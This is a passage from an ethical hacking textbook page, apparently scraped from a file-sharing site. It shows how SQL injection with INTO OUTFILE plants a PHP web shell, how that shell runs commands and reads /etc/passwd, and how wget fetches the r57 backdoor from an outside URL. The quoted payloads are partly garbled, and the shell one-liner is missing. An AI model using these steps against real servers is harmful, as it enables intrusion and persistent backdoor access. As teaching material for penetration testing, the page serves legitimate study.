Ethical Hacking and Penetration Testing Guide

354
◾ 
Ethical Hacking and Penetration Testing Guide
/var/www
directory, which is our current directory that happens to be writable. You can deter-
mine the current directory by executing the 
datadir()
function.
Our simple one-line backdoor is as follows:

This will help us execute system commands via the GET parameter CMD. The 
passthru()
in PHP allows us to execute arbitrary commands upon the system. To write files in the directory, 
we will use 
INTO OUTOFILE
command and specify the directory.
Syntax
http://localhost/index.php?support=yes’ and 1=0 UNION SELECT 1,GET[\’cmd’\’)]);>,3,4,5,6 INTO OUTFILE ‘/var/www/shell.php’ –
Therefore, as the command is pretty much simple, it will write the PHP code in the column 
to a file shell.php.
If everything goes fine, we should have got our backdoor uploaded and we can easily execute 
commands via the cmd parameter. Let’s try reading 
/etc/passwd
.
Syntax
http://localhost/shell.php?cmd=cat/etc/passwd
Here, we can execute our commands on the target system, which is Linux based. We would 
try to read Linux-specific files. If it were running a Windows OS, we would have tried to read files 
such as “boot.ini” or “winboot.ini”.
Since we are now able to execute our commands upon the system, we will now try to down-
load a more powerful backdoor from an external url and write onto the system. We can use wget 
to download a file from an external location with parameter –O to output the particular file to a 
location.
Syntax
wget “http://target.com/r57.txt” –O r57.php
Now, we can directly access our r57.php shell by accessing the following url:
http://localhost/r57.php

Web Hacking
◾ 

Yüklə 22,44 Mb.

Dostları ilə paylaş: